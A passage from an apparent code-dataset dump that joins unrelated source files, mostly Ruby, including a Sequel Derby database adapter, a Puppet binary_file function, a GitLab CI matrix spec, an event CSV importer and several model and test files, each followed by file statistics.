expect(assigns(:already_added_projects)).to eq([@project])
expect(assigns(:repos)).to eq([@repo])
end
it 'does not show already added project' do
@project = create(:empty_project, import_type: 'fogbugz', creator_id: user.id, import_source: 'vim')
stub_client(repos: [@repo])
get :status
expect(assigns(:already_added_projects)).to eq([@project])
expect(assigns(:repos)).to eq([])
end
end
end
| 23.128205 | 106 | 0.650776 |
1c1921b8e69d69f61a10c06d0c2d0641075a6299 | 10,222 | # frozen-string-literal: true
Sequel::JDBC.load_driver('org.apache.derby.jdbc.EmbeddedDriver', :Derby)
require_relative 'transactions'
module Sequel
module JDBC
Sequel.synchronize do
DATABASE_SETUP[:derby] = proc do |db|
db.extend(Sequel::JDBC::Derby::DatabaseMethods)
db.dataset_class = Sequel::JDBC::Derby::Dataset
org.apache.derby.jdbc.EmbeddedDriver
end
end
module Derby
module DatabaseMethods
include ::Sequel::JDBC::Transactions
# Derby doesn't support casting integer to varchar, only integer to char,
# and char(254) appears to have the widest support (with char(255) failing).
# This does add a bunch of extra spaces at the end, but those will be trimmed
# elsewhere.
def cast_type_literal(type)
(type == String) ? 'CHAR(254)' : super
end
def database_type
:derby
end
def freeze
svn_version
super
end
# Derby uses an IDENTITY sequence for autoincrementing columns.
def serial_primary_key_options
{:primary_key => true, :type => Integer, :identity=>true, :start_with=>1}
end
# The SVN version of the database.
def svn_version
@svn_version ||= begin
v = synchronize{|c| c.get_meta_data.get_database_product_version}
v =~ /\((\d+)\)\z/
$1.to_i
end
end
# Derby supports transactional DDL statements.
def supports_transactional_ddl?
true
end
private
# Derby optimizes away Sequel's default check of SELECT NULL FROM table,
# so use a SELECT * FROM table there.
def _table_exists?(ds)
ds.first
end
def alter_table_sql(table, op)
case op[:op]
when :rename_column
"RENAME COLUMN #{quote_schema_table(table)}.#{quote_identifier(op[:name])} TO #{quote_identifier(op[:new_name])}"
when :set_column_type
# Derby is very limited in changing a columns type, so adding a new column and then dropping the existing column is
# the best approach, as mentioned in the Derby documentation.
temp_name = :x_sequel_temp_column_x
[alter_table_sql(table, op.merge(:op=>:add_column, :name=>temp_name)),
from(table).update_sql(temp_name=>::Sequel::SQL::Cast.new(op[:name], op[:type])),
alter_table_sql(table, op.merge(:op=>:drop_column)),
alter_table_sql(table, op.merge(:op=>:rename_column, :name=>temp_name, :new_name=>op[:name]))]
when :set_column_null
"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(op[:name])} #{op[:null] ? 'NULL' : 'NOT NULL'}"
else
super
end
end
# Derby does not allow adding primary key constraints to NULLable columns.
def can_add_primary_key_constraint_on_nullable_columns?
false
end
# Derby doesn't allow specifying NULL for columns, only NOT NULL.
def column_definition_null_sql(sql, column)
null = column.fetch(:null, column[:allow_null])
sql << " NOT NULL" if null == false || (null.nil? && column[:primary_key])
end
# Add NOT LOGGED for temporary tables to improve performance.
def create_table_sql(name, generator, options)
s = super
s += ' NOT LOGGED' if options[:temp]
s
end
# Insert data from the current table into the new table after
# creating the table, since it is not possible to do it in one step.
def create_table_as(name, sql, options)
super
from(name).insert(sql.is_a?(Dataset) ? sql : dataset.with_sql(sql))
end
# Derby currently only requires WITH NO DATA, with a separate insert
# to import data.
def create_table_as_sql(name, sql, options)
"#{create_table_prefix_sql(name, options)} AS #{sql} WITH NO DATA"
end
# Temporary table creation on Derby uses DECLARE instead of CREATE.
def create_table_prefix_sql(name, options)
if options[:temp]
"DECLARE GLOBAL TEMPORARY TABLE #{quote_identifier(name)}"
else
super
end
end
DATABASE_ERROR_REGEXPS = {
/The statement was aborted because it would have caused a duplicate key value in a unique or primary key constraint or unique index/ => UniqueConstraintViolation,
/violation of foreign key constraint/ => ForeignKeyConstraintViolation,
/The check constraint .+ was violated/ => CheckConstraintViolation,
/cannot accept a NULL value/ => NotNullConstraintViolation,
/A lock could not be obtained due to a deadlock/ => SerializationFailure,
}.freeze
def database_error_regexps
DATABASE_ERROR_REGEXPS
end
# Use IDENTITY_VAL_LOCAL() to get the last inserted id.
def last_insert_id(conn, opts=OPTS)
statement(conn) do |stmt|
sql = 'SELECT IDENTITY_VAL_LOCAL() FROM sysibm.sysdummy1'
rs = log_connection_yield(sql, conn){stmt.executeQuery(sql)}
rs.next
rs.getLong(1)
end
end
# Handle nil values by using setNull with the correct parameter type.
def set_ps_arg_nil(cps, i)
cps.setNull(i, cps.getParameterMetaData.getParameterType(i))
end
# Derby uses RENAME TABLE syntax to rename tables.
def rename_table_sql(name, new_name)
"RENAME TABLE #{quote_schema_table(name)} TO #{quote_schema_table(new_name)}"
end
# Primary key indexes appear to be named sqlNNNN on Derby
def primary_key_index_re
/\Asql\d+\z/i
end
# If an :identity option is present in the column, add the necessary IDENTITY SQL.
def type_literal(column)
if column[:identity]
sql = "#{super} GENERATED BY DEFAULT AS IDENTITY"
if sw = column[:start_with]
sql += " (START WITH #{sw.to_i}"
sql << " INCREMENT BY #{column[:increment_by].to_i}" if column[:increment_by]
sql << ")"
end
sql
else
super
end
end
# Derby uses clob for text types.
def uses_clob_for_text?
true
end
def valid_connection_sql
@valid_connection_sql ||= select(1).sql
end
end
class Dataset < JDBC::Dataset
# Derby doesn't support an expression between CASE and WHEN,
# so remove conditions.
def case_expression_sql_append(sql, ce)
super(sql, ce.with_merged_expression)
end
# If the type is String, trim the extra spaces since CHAR is used instead
# of varchar. This can cause problems if you are casting a char/varchar to
# a string and the ending whitespace is important.
def cast_sql_append(sql, expr, type)
if type == String
sql << "RTRIM("
super
sql << ')'
else
super
end
end
def complex_expression_sql_append(sql, op, args)
case op
when :%, :'B~'
complex_expression_emulate_append(sql, op, args)
when :&, :|, :^, :<<, :>>
raise Error, "Derby doesn't support the #{op} operator"
when :**
sql << 'exp('
literal_append(sql, args[1])
sql << ' * ln('
literal_append(sql, args[0])
sql << "))"
when :extract
sql << args[0].to_s << '('
literal_append(sql, args[1])
sql << ')'
else
super
end
end
# Derby supports GROUP BY ROLLUP (but not CUBE)
def supports_group_rollup?
true
end
# Derby does not support IS TRUE.
def supports_is_true?
false
end
# Derby does not support IN/NOT IN with multiple columns
def supports_multiple_column_in?
false
end
private
def empty_from_sql
" FROM sysibm.sysdummy1"
end
# Derby needs a hex string casted to BLOB for blobs.
def literal_blob_append(sql, v)
sql << "CAST(X'" << v.unpack("H*").first << "' AS BLOB)"
end
# Derby needs the standard workaround to insert all default values into
# a table with more than one column.
def insert_supports_empty_values?
false
end
# Newer Derby versions can use the FALSE literal, but older versions need an always false expression.
def literal_false
if db.svn_version >= 1040133
'FALSE'
else
'(1 = 0)'
end
end
# Derby handles fractional seconds in timestamps, but not in times
def literal_sqltime(v)
v.strftime("'%H:%M:%S'")
end
# Newer Derby versions can use the TRUE literal, but older versions need an always false expression.
def literal_true
if db.svn_version >= 1040133
'TRUE'
else
'(1 = 1)'
end
end
# Derby supports multiple rows for VALUES in INSERT.
def multi_insert_sql_strategy
:values
end
# Emulate the char_length function with length
def native_function_name(emulated_function)
if emulated_function == :char_length
'length'
else
super
end
end
# Offset comes before limit in Derby
def select_limit_sql(sql)
if o = @opts[:offset]
sql << " OFFSET "
literal_append(sql, o)
sql << " ROWS"
end
if l = @opts[:limit]
sql << " FETCH FIRST "
literal_append(sql, l)
sql << " ROWS ONLY"
end
end
end
end
end
end
| 32.868167 | 172 | 0.575426 |
e2c732c6838eef1f7b42b56b9fa4d8a6eecadbdf | 701 | Pod::Spec.new do |spec|
spec.name = 'CETableViewBindingHelper'
spec.version = '1.0.0'
spec.license = {
:type => 'MIT',
:file => 'MIT-LICENSE.txt'
}
spec.homepage = 'https://github.com/Advanced-Jewish-Technologies/CETableViewBinding'
spec.authors = {
'Dark Satyr' => '[email protected]'
}
spec.summary = 'ReactiveCocoa TableView Binding Helper.'
spec.source = { git: 'https://github.com/Advanced-Jewish-Technologies/CETableViewBinding.git',
tag: spec.version.to_s }
spec.platform = :ios, '8.0'
spec.requires_arc = true
spec.source_files = '*.{h,m}'
spec.dependency 'ReactiveObjC', '~> 3.1'
end
| 31.863636 | 102 | 0.610556 |
f7423b8ca65e7db7416538db5cd32687c34838dc | 3,849 | # ****************************************************************************
#
# Copyright (c) Microsoft Corporation.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
# ****************************************************************************
require '../../util/assert.rb'
# When a method is called, Ruby searches for it in a number of places in the following order:
#
# - Among the methods defined in that object (i.e., singleton methods).
# - Among the methods defined by that object's class.
# - Among the methods of the modules included by that class.
# - Among the methods of the superclass.
# - Among the methods of the modules included by that superclass.
# - Repeats Steps 4 and 5 until the top-level object is reached.
class My
def method1; 10; end
def method2; 20; end
end
x = My.new
assert_equal(x.method1, 10)
assert_raise(NoMethodError) { x.method_not_exists }
class << x
def method2; 30; end
def method3; 40; end
end
assert_equal(x.method1, 10)
assert_equal(x.method2, 30)
assert_equal(x.method3, 40)
assert_raise(NoMethodError) { x.method_not_exists }
# include module
module Simple
def method1; -10; end
def method2; -20; end
end
class My_with_module
include Simple
def method2; 20; end
def method3; 30; end
end
x = My_with_module.new
assert_equal(x.method1, -10)
assert_equal(x.method2, 20)
assert_equal(x.method3, 30)
assert_raise(NoMethodError) { x.method_not_exists }
class << x
def method4; 40; end
end
assert_equal(x.method1, -10)
assert_equal(x.method2, 20)
assert_equal(x.method3, 30)
assert_equal(x.method4, 40)
assert_raise(NoMethodError) { x.method_not_exists }
# with superclass
class My_base
def method6; -600; end
def method7; -700; end
end
class My_derived < My_base
def method7; 700; end
def method8; 800; end
end
x = My_derived.new
assert_equal(x.method6, -600)
assert_equal(x.method7, 700)
assert_equal(x.method8, 800)
assert_raise(NoMethodError) { x.method_not_exists }
# base with included module
class My_base_with_module
include Simple
def method6; -600; end
def method7; -700; end
end
class My_derived2 < My_base_with_module
def method2; 200; end
def method7; 700; end
def method8; 800; end
end
x = My_derived2.new
assert_equal(x.method1, -10)
assert_equal(x.method2, 200)
assert_equal(x.method6, -600)
assert_equal(x.method7, 700)
assert_equal(x.method8, 800)
assert_raise(NoMethodError) { x.method_not_exists }
class << x
end
assert_equal(x.method1, -10)
assert_equal(x.method2, 200)
assert_equal(x.method6, -600)
assert_equal(x.method7, 700)
assert_equal(x.method8, 800)
assert_raise(NoMethodError) { x.method_not_exists }
# multiple levels
class My_level1
include Simple
def method1; 100; end
end
class My_level2 < My_level1
def method2; 200; end
end
class My_level3 < My_level2
def method3; 300; end
end
x = My_level3.new
assert_equal(x.method1, 100)
assert_equal(x.method2, 200)
assert_equal(x.method3, 300)
assert_raise(NoMethodError) { x.method_not_exists }
# access control related to inheritance: the public override method in superclass
class My_base_with_public_method
public
def method; 100; end
end
class My_derived_with_private_method < My_base_with_public_method
private
def method; 200; end
end
x = My_derived_with_private_method.new
#assert_raise(NoMethodError) { x.method } | 24.673077 | 97 | 0.708756 |
18ac151d570c0d32933eb7841d991baf1434043e | 1,003 | # frozen_string_literal: true
module Doorkeeper
class AccessGrant < ActiveRecord::Base
belongs_to :resource, polymorphic: true
self.table_name = "#{table_name_prefix}oauth_access_grants#{table_name_suffix}".to_sym
include AccessGrantMixin
include ActiveModel::MassAssignmentSecurity if defined?(::ProtectedAttributes)
belongs_to_options = {
class_name: "Doorkeeper::Application",
inverse_of: :access_grants
}
if defined?(ActiveRecord::Base) && ActiveRecord::VERSION::MAJOR >= 5
belongs_to_options[:optional] = true
end
belongs_to :application, belongs_to_options
validates :resource, :application_id, :token, :expires_in, :redirect_uri, presence: true
validates :token, uniqueness: true
before_validation :generate_token, on: :create
private
# Generates token value with UniqueToken class.
#
# @return [String] token value
#
def generate_token
self.token = UniqueToken.generate
end
end
end
| 26.394737 | 92 | 0.720837 |
e238466e60eba41a9fbb60e83f2a446907cc2a06 | 387 | class CreateLicenses < ActiveRecord::Migration
def change
create_table :licenses do |t|
t.integer :profile_id
t.string :license_type
t.string :unit
t.string :title
t.date :publish_at
t.text :source
t.string :source_link
t.text :origin_desc
t.text :memo
t.timestamps
end
add_index :licenses, :profile_id
end
end
| 21.5 | 46 | 0.640827 |
874b60cc754a1c70f1333c79929f02b5594dcf52 | 717 | module Rucc
class Parser
module Goto
private
# @return [Node]
def read_goto_stmt
if next_token?('*')
# [GNU] computed goto. "goto *p" jumps to the address pointed by p.
tok = peek
expr = read_cast_expr
if expr.ty.kind != Kind::PTR
Util.errort!(tok, "pointer expected for computed goto, but got #{expr}")
end
return Node.ast_computed_goto(expr)
end
tok = get
if !tok || (tok.kind != T::IDENT)
Util.errort!(tok, "identifier expected, but got #{tok}")
end
expect!(';')
r = Node.ast_goto(tok.sval)
@gotos.push(r)
r
end
end
end
end
| 23.9 | 84 | 0.521618 |
4ac921e224b0de7e9027d2f612684d8467362f8e | 39 | module Reports::BasicDetailsHelper
end
| 13 | 34 | 0.871795 |
4ada5d1d2e73945d899fca4b9570648722052991 | 492 | # frozen_string_literal: true
RSpec.describe "copy_static_files", type: :rake do
before do
subject.execute
end
after(:all) do
cleanup
end
it "has the correct name" do
expect(subject.name).to eq("copy_static_files")
end
it "copy network security config xml " do
expect(File.open("rake/static_files/network_security_config.xml").read)
.to be_equivalent_to(File.open("app/src/main/res/xml/network_security_config.xml").read)
end
def cleanup; end
end
| 21.391304 | 94 | 0.721545 |
6a168e6f3031dba7dcbf5a3f31909f372f47395d | 267 | module EbayTrading # :nodoc:
module Types # :nodoc:
class SellerDashboardAlertSeverityCode
extend Enumerable
extend Enumeration
Informational = 'Informational'
Warning = 'Warning'
StrongWarning = 'StrongWarning'
end
end
end
| 20.538462 | 42 | 0.685393 |
1d8f0818a651040d19e54ca1a0c2e05a1faa92c8 | 5,446 | # encoding: UTF-8
require 'securerandom'
module Server
module Helpers
#
# ChefServer Module
#
# This module provides helpers related to the Chef Server Component
module ChefServer
module_function
# Password of the Provisioning User
# Generate or load the password of the provisioning user in chef-server
#
# @param node [Chef::Node] Chef Node object
# @return [String] password of the provisioning user
def provisioning_password(node)
@provisioning_password ||= begin
if File.exist?("#{Server::Helpers.provisioning_data_dir(node)}/provisioning_password")
File.read("#{Server::Helpers.provisioning_data_dir(node)}/provisioning_password")
elsif node['provisioning']['chef-server']['provisioning_password']
node['provisioning']['chef-server']['provisioning_password']
else
SecureRandom.base64(20)
end
end
end
# Upload a specific cookbook to our chef-server
#
# @param node [Chef::Node] Chef Node object
# @param cookbook [String] Cookbook Name
def upload_cookbook(node, cookbook)
execute "Upload Cookbook => #{cookbook}" do
command "knife cookbook upload #{cookbook} --cookbook-path #{Chef::Config[:cookbook_path]}"
environment(
'KNIFE_HOME' => Server::Helpers.provisioning_data_dir(node)
)
not_if "knife cookbook show #{cookbook}"
end
end
# Get the Hostname of the Chef Server
#
# @param node [Chef::Node] Chef Node object
# @return hostname [String] The hostname of the chef-server
def chef_server_hostname(node)
Server::Helpers::Component.component_hostname(node, 'chef-server')
end
# Returns the FQDN of the Chef Server
#
# @param node [Chef::Node] Chef Node object
# @return [String]
def chef_server_fqdn(node)
@chef_server_fqdn ||= begin
chef_server_node = Chef::Node.load(chef_server_hostname(node))
Server::Helpers::Component.component_fqdn(node, 'chef-server', chef_server_node)
end
end
# Returns the Chef Server URL of our Organization
#
# @param node [Chef::Node] Chef Node object
# @return [String] chef-server url
def chef_server_url(node)
"https://#{chef_server_fqdn(node)}/organizations/#{node['provisioning']['chef-server']['organization']}"
end
# Generates the Chef Server Attributes
#
# @param node [Chef::Node] Chef Node object
# @return [Hash] chef-server attributes
def chef_server_attributes(node)
@chef_server_attributes = {
'chef-server-12' => {
'provisioner' => {
'organization' => node['provisioning']['chef-server']['organization'],
'password' => provisioning_password(node)
},
'api_fqdn' => chef_server_fqdn(node),
'store_keys_databag' => false,
'plugin' => {
'reporting' => node['provisioning']['chef-server']['enable-reporting']
}
}
}
@chef_server_attributes = Chef::Mixin::DeepMerge.hash_only_merge(
@chef_server_attributes,
Server::Helpers::Analytics.analytics_server_attributes(node)
)
@chef_server_attributes = Chef::Mixin::DeepMerge.hash_only_merge(
@chef_server_attributes,
Server::Helpers::Supermarket.supermarket_server_attributes(node)
)
@chef_server_attributes = Chef::Mixin::DeepMerge.hash_only_merge(
@chef_server_attributes,
Server::Helpers::Component.component_attributes(node, 'chef-server')
)
@chef_server_attributes
end
# Chef Server Config
# This is used by all the `machine` resources to point to our chef-server
# and any interaction we have with the chef-server like data-bags, roles, etc.
#
# @param node [Chef::Node] Chef Node object
# @return [Hash] chef-server attributes
def chef_server_config(node)
{
chef_server_url: chef_server_url(node),
options: {
client_name: 'provisioner',
signing_key_filename: "#{Server::Helpers.provisioning_data_dir(node)}/provisioner.pem"
}
}
end
end
end
# Module that exposes multiple helpers
module DSL
# Password of the Provisioning User
def provisioning_password
Server::Helpers::ChefServer.provisioning_password(node)
end
# Upload a cookbook to the chef-server
def upload_cookbook(cookbook)
Server::Helpers::ChefServer.upload_cookbook(node, cookbook)
end
# Get the Hostname of the Chef Server
def chef_server_hostname
Server::Helpers::ChefServer.chef_server_hostname(node)
end
# Return the chef-server config
def chef_server_config
Server::Helpers::ChefServer.chef_server_config(node)
end
# Return the FQDN of the Chef Server
def chef_server_fqdn
Server::Helpers::ChefServer.chef_server_fqdn(node)
end
# Return the Chef Server URL of our Organization
def chef_server_url
Server::Helpers::ChefServer.chef_server_url(node)
end
# Generate the Chef Server Attributes
def chef_server_attributes
Server::Helpers::ChefServer.chef_server_attributes(node)
end
end
end
| 33.826087 | 112 | 0.641572 |
bf5de704a7f50061fe88b981f9d21b8ccf34ad2d | 783 | class ManageIQ::Providers::Microsoft::InfraManager::Vm < ManageIQ::Providers::InfraManager::Vm
include_concern 'ManageIQ::Providers::Microsoft::InfraManager::VmOrTemplateShared'
POWER_STATES = {
"Running" => "on",
"Paused" => "suspended",
"Saved" => "suspended",
"PowerOff" => "off",
}.freeze
def self.calculate_power_state(raw_power_state)
POWER_STATES[raw_power_state] || super
end
def validate_migrate
validate_unsupported("Migrate")
end
def proxies4job(_job = nil)
{
:proxies => [MiqServer.my_server],
:message => 'Perform SmartState Analysis on this VM'
}
end
def has_active_proxy?
true
end
def has_proxy?
true
end
def validate_publish
validate_unsupported("Publish VM")
end
end
| 20.605263 | 94 | 0.675607 |
3347a55583c861879eb8479abad607c17e5be3d4 | 4,020 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013-2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
require 'component_helper'
require 'java_buildpack/framework/introscope_agent'
describe JavaBuildpack::Framework::IntroscopeAgent do
include_context 'component_helper'
let(:configuration) do
{ 'default_agent_name' => "$(expr \"$VCAP_APPLICATION\" : '.*application_name[\": ]*\\([A-Za-z0-9_-]*\\).*')" }
end
let(:vcap_application) do
{ 'application_name' => 'test-application-name',
'application_uris' => %w(test-application-uri-0 test-application-uri-1) }
end
it 'does not detect without introscope-n/a service' do
expect(component.detect).to be_nil
end
context do
let(:credentials) { {} }
before do
allow(services).to receive(:one_service?).with(/introscope/, 'host-name').and_return(true)
allow(services).to receive(:find_service).and_return('credentials' => credentials)
end
it 'detects with introscope-n/a service' do
expect(component.detect).to eq("introscope-agent=#{version}")
end
it 'expands Introscope agent zip',
cache_fixture: 'stub-introscope-agent.tar' do
component.compile
expect(sandbox + 'Agent.jar').to exist
end
it 'raises error if host-name not specified' do
expect { component.release }.to raise_error(/'host-name' credential must be set/)
end
context do
let(:credentials) { { 'host-name' => 'test-host-name' } }
it 'updates JAVA_OPTS' do
component.release
expect(java_opts).to include('-javaagent:$PWD/.java-buildpack/introscope_agent/Agent.jar')
expect(java_opts).to include('-Dcom.wily.introscope.agentProfile=$PWD/.java-buildpack/introscope_agent/core' \
'/config/IntroscopeAgent.profile')
expect(java_opts).to include('-Dintroscope.agent.defaultProcessName=test-application-name')
expect(java_opts).to include('-Dintroscope.agent.hostName=test-application-uri-0')
expect(java_opts).to include('-Dintroscope.agent.enterprisemanager.transport.tcp.host.DEFAULT=test-host-name')
expect(java_opts).to include('-Dcom.wily.introscope.agent.agentName=$(expr "$VCAP_APPLICATION" : ' \
'\'.*application_name[": ]*\\([A-Za-z0-9_-]*\\).*\')')
end
context do
let(:credentials) { super().merge 'agent-name' => 'another-test-agent-name' }
it 'adds agent-name from credentials to JAVA_OPTS if specified' do
component.release
expect(java_opts).to include('-Dcom.wily.introscope.agent.agentName=another-test-agent-name')
end
end
context do
let(:credentials) { super().merge 'port' => 'test-port' }
it 'adds port from credentials to JAVA_OPTS if specified' do
component.release
expect(java_opts).to include('-Dintroscope.agent.enterprisemanager.transport.tcp.port.DEFAULT=test-port')
end
end
context do
let(:credentials) { super().merge 'ssl' => 'true' }
it 'adds ssl socket factory from credentials to JAVA_OPTS if specified' do
component.release
expect(java_opts).to include('-Dintroscope.agent.enterprisemanager.transport.tcp.socketfactory.DEFAULT=' \
'com.wily.isengard.postofficehub.link.net.SSLSocketFactory')
end
end
end
end
end
| 35.263158 | 118 | 0.670647 |
ff44a235ea5993c09552a385bff9c58086db4c11 | 5,162 | # frozen_string_literal: true
require 'spec_helper'
require_dependency 'active_model'
RSpec.describe ::Gitlab::Ci::Config::Entry::Product::Matrix do
subject(:matrix) { described_class.new(config) }
describe 'validations' do
before do
matrix.compose!
end
context 'when entry config value is correct' do
let(:config) do
[
{ 'VAR_1' => [1, 2, 3], 'VAR_2' => [4, 5, 6] },
{ 'VAR_3' => %w[a b], 'VAR_4' => %w[c d] }
]
end
describe '#valid?' do
it { is_expected.to be_valid }
end
end
context 'when entry config generates too many jobs' do
let(:config) do
[
{
'VAR_1' => (1..10).to_a,
'VAR_2' => (11..20).to_a
}
]
end
describe '#valid?' do
it { is_expected.not_to be_valid }
end
describe '#errors' do
it 'returns error about too many jobs' do
expect(matrix.errors)
.to include('matrix config generates too many jobs (maximum is 50)')
end
end
end
context 'when entry config has only one variable with multiple values' do
let(:config) do
[
{
'VAR_1' => %w[build test]
}
]
end
describe '#valid?' do
it { is_expected.to be_valid }
end
describe '#errors' do
it 'returns no errors' do
expect(matrix.errors)
.to be_empty
end
end
describe '#value' do
before do
matrix.compose!
end
it 'returns the value without raising an error' do
expect(matrix.value).to eq([{ 'VAR_1' => %w[build test] }])
end
end
context 'when entry config has only one variable with one value' do
let(:config) do
[
{
'VAR_1' => %w[test]
}
]
end
describe '#valid?' do
it { is_expected.to be_valid }
end
describe '#errors' do
it 'returns no errors' do
expect(matrix.errors)
.to be_empty
end
end
describe '#value' do
before do
matrix.compose!
end
it 'returns the value without raising an error' do
expect(matrix.value).to eq([{ 'VAR_1' => %w[test] }])
end
end
end
end
context 'when config value has wrong type' do
let(:config) { {} }
describe '#valid?' do
it { is_expected.not_to be_valid }
end
describe '#errors' do
it 'returns error about incorrect type' do
expect(matrix.errors)
.to include('matrix config should be an array of hashes')
end
end
end
end
describe '.compose!' do
context 'when valid job entries composed' do
let(:config) do
[
{ PROVIDER: 'aws', STACK: %w[monitoring app1 app2] },
{ STACK: %w[monitoring backup app], PROVIDER: 'ovh' },
{ PROVIDER: 'gcp', STACK: %w[data processing], ARGS: 'normal' },
{ PROVIDER: 'vultr', STACK: 'data', ARGS: 'store' }
]
end
before do
matrix.compose!
end
describe '#value' do
it 'returns key value' do
expect(matrix.value).to match(
[
{ 'PROVIDER' => %w[aws], 'STACK' => %w[monitoring app1 app2] },
{ 'PROVIDER' => %w[ovh], 'STACK' => %w[monitoring backup app] },
{ 'ARGS' => %w[normal], 'PROVIDER' => %w[gcp], 'STACK' => %w[data processing] },
{ 'ARGS' => %w[store], 'PROVIDER' => %w[vultr], 'STACK' => %w[data] }
]
)
end
end
describe '#descendants' do
it 'creates valid descendant nodes' do
expect(matrix.descendants.count).to eq(config.size)
expect(matrix.descendants)
.to all(be_an_instance_of(::Gitlab::Ci::Config::Entry::Product::Variables))
end
end
end
context 'with empty config' do
let(:config) { [] }
before do
matrix.compose!
end
describe '#value' do
it 'returns empty value' do
expect(matrix.value).to eq([])
end
end
end
end
describe '#number_of_generated_jobs' do
before do
matrix.compose!
end
subject { matrix.number_of_generated_jobs }
context 'with empty config' do
let(:config) { [] }
it { is_expected.to be_zero }
end
context 'with only one variable' do
let(:config) do
[{ 'VAR_1' => (1..10).to_a }]
end
it { is_expected.to eq(10) }
end
context 'with two variables' do
let(:config) do
[{ 'VAR_1' => (1..10).to_a, 'VAR_2' => (1..5).to_a }]
end
it { is_expected.to eq(50) }
end
context 'with two sets of variables' do
let(:config) do
[
{ 'VAR_1' => (1..10).to_a, 'VAR_2' => (1..5).to_a },
{ 'VAR_3' => (1..2).to_a, 'VAR_4' => (1..3).to_a }
]
end
it { is_expected.to eq(56) }
end
end
end
| 23.463636 | 94 | 0.506974 |
6ac6b360d08143c85e6a2f26c26f215fba3d713f | 4,197 | class Event::Page::CsvImporter
include Cms::CsvImportBase
self.required_headers = [ Event::Page.t(:filename) ]
attr_reader :site, :node, :user
def initialize(site, node, user)
@site = site
@node = node
@user = user
end
def import(file, opts = {})
@task = opts[:task]
put_log("import start " + ::File.basename(file.name))
import_csv(file)
end
private
def model
Event::Page
end
def put_log(message)
if @task
@task.log(message)
else
Rails.logger.info(message)
end
end
def import_csv(file)
table = CSV.read(file.path, headers: true, encoding: 'SJIS:UTF-8')
table.each_with_index do |row, i|
begin
item = update_row(row)
put_log("update #{i + 1}: #{item.name}")
rescue => e
put_log("error #{i + 1}: #{e}")
end
end
end
def update_row(row)
filename = "#{node.filename}/#{row[model.t(:filename)]}"
item = model.find_or_initialize_by(site_id: site.id, filename: filename)
raise I18n.t('errors.messages.auth_error') unless item.allowed?(:import, user, site: site, node: node)
item.site = site
set_page_attributes(row, item)
raise I18n.t('errors.messages.auth_error') unless item.allowed?(:import, user, site: site, node: node)
if item.save
item
else
raise item.errors.full_messages.join(", ")
end
end
def value(row, key)
row[model.t(key)].try(:strip)
end
def ary_value(row, key)
row[model.t(key)].to_s.split(/\n/).map(&:strip)
end
def label_value(item, row, key)
item.send("#{key}_options").to_h[value(row, key)]
end
def category_name_tree_to_ids(name_trees)
category_ids = []
name_trees.each do |cate|
names = cate.split("/")
last_index = names.size - 1
last_name = names[last_index]
parent_names = names.slice(0...(names.size - 1))
cond = { name: last_name, depth: last_index + 1, route: /^category\// }
node_ids = Cms::Node.site(site).where(cond).pluck(:id)
node_ids.each do |node_id|
cate = Cms::Node.find(node_id)
if parent_names == cate.parents.pluck(:name)
category_ids << cate.id
end
end
end
category_ids
end
def set_page_attributes(row, item)
# basic
layout = Cms::Layout.site(site).where(name: value(row, :layout)).first
item.name = value(row, :name)
item.index_name = value(row, :index_name)
item.layout = layout
item.order = value(row, :order)
# meta
item.keywords = value(row, :keywords)
item.description = value(row, :description)
item.summary_html = value(row, :summary_html)
# body
item.html = value(row, :html)
# event body
item.schedule = value(row, :schedule)
item.venue = value(row, :venue)
item.content = value(row, :content)
item.cost = value(row, :cost)
item.related_url = value(row, :related_url)
item.contact = value(row, :contact)
# category
category_name_tree = ary_value(row, :categories)
category_ids = category_name_tree_to_ids(category_name_tree)
categories = Category::Node::Base.site(site).in(id: category_ids)
#if node.st_categories.present?
# filenames = node.st_categories.pluck(:filename)
# filenames += node.st_categories.map { |c| /^#{c.filename}\// }
# categories = categories.in(filename: filenames)
#end
item.category_ids = categories.pluck(:id)
# event
item.event_name = value(row, :event_name)
item.event_dates = value(row, :event_dates)
# related pages
page_names = ary_value(row, :related_pages)
item.related_page_ids = Cms::Page.site(site).in(filename: page_names).pluck(:id)
# crumb
item.parent_crumb_urls = value(row, :parent_crumb)
# released
item.released = value(row, :released)
item.release_date = value(row, :release_date)
item.close_date = value(row, :close_date)
# groups
group_names = ary_value(row, :groups)
item.group_ids = SS::Group.in(name: group_names).pluck(:id)
item.permission_level = value(row, :permission_level)
# state
state = label_value(item, row, :state)
item.state = state || "public"
end
end
| 26.732484 | 106 | 0.641172 |
1a4eb9e8b0fe77ab01e043487f89dbf4c4f1af44 | 1,315 | # Loads a binary file from a module or file system and returns its contents as a `Binary`.
# The argument to this function should be a `<MODULE NAME>/<FILE>`
# reference, which will load `<FILE>` from a module's `files`
# directory. (For example, the reference `mysql/mysqltuner.pl` will load the
# file `<MODULES DIRECTORY>/mysql/files/mysqltuner.pl`.)
#
# This function also accepts an absolute file path that allows reading
# binary file content from anywhere on disk.
#
# An error is raised if the given file does not exists.
#
# To search for the existence of files, use the `find_file()` function.
#
# - since 4.8.0
#
# @since 4.8.0
#
Puppet::Functions.create_function(:binary_file, Puppet::Functions::InternalFunction) do
dispatch :binary_file do
scope_param
param 'String', :path
end
def binary_file(scope, unresolved_path)
path = Puppet::Parser::Files.find_file(unresolved_path, scope.compiler.environment)
unless path && Puppet::FileSystem.exist?(path)
#TRANSLATORS the string "binary_file()" should not be translated
raise Puppet::ParseError, _("binary_file(): The given file '%{unresolved_path}' does not exist") % { unresolved_path: unresolved_path }
end
Puppet::Pops::Types::PBinaryType::Binary.from_binary_string(Puppet::FileSystem.binread(path))
end
end
| 39.848485 | 141 | 0.735361 |
1ae7344ed2be94f9fd93e5cbc90b444e1b1c617b | 315 | require 'rails_helper'
RSpec.describe Water, type: :model do
describe 'associations' do
it { should belong_to(:user) }
end
describe 'validations' do
it { should validate_presence_of(:amount) }
